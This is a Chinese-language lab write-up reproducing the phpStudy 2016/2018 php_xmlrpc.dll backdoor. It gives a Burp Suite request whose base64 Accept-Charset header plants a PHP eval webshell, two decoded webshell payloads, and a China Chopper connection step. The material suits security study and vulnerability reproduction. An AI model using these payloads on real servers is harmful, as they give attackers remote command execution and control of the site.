漏洞简介

关于phpStudy的后门漏洞可参考https://blog.csdn.net/weixin_43886632/article/details/101294081

phpStudy在下列文件中存在后门

phpStudy2016
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

测试环境的搭建

环境

• vmware workstation14
• win7网站（ip 192.168.43.196）
• win10攻击者（ip 192.168.43.253）
• burpsuite
• phpstudy2018

安装phpstudy2018

phpstudy2018 安装包下载地址
http://downza.51speed.top/2019/01/08/phpStudySetup.rar?ssig=8b79b632ea138a93faa59871dd6d36f83784f3da&time_stamp=1580838908&fn=06542359202e44c86b60256ca293f836
安装过程不讲

安装成功

安装成功后访问http://192.168.43.196

image.png

使用notepad++打开 C:\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll,检索eval,如下图所示,说明存在后门

php_xmlrpc.dll中含有后门.png

后门的利用

通过burpsuite抓包,客户端可以通过HTTP头部的Accept-Charset字段来向后台提交命令

执行命令

写入shellcode

In [15]: def b64encode(a):
    ...:             print(base64.b64encode(a.encode('utf-8')))
In [30]: b64encode(r"""$f =fopen("C:\phpStudy\PHPTutorial\WWW\x.php","w");fwrite($f,"<?php @eval(\$_POST['cmd']); ?>"); fclose($f);""")
b'JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs='

使用burpsuiter repeater模块写入webshell,HTTP头部如下

GET / HTTP/1.1
Host: 192.168.43.196
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Charset: JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=
Accept-Encoding: gzip,deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 2

两个一句话木马

atob('c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=')
"system('echo ^<?php @eval($_POST[\"shell\"])?^>>PHPTutorial\\WWW\\shell.php');"
atob('JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=')
"$f =fopen(\"C:\\phpStudy\\PHPTutorial\\WWW\\x.php\",\"w\");fwrite($f,\"<?php @eval(\\$_POST['cmd']); ?>\");fclose($f);"

使用菜刀连接

使用菜刀连接

打开shell

参考资料

• Phpstudy漏洞复现利用
  https://blog.csdn.net/hsj_csdn/article/details/102558115
• poc
  https://blog.csdn.net/weixin_43886632/article/details/101294081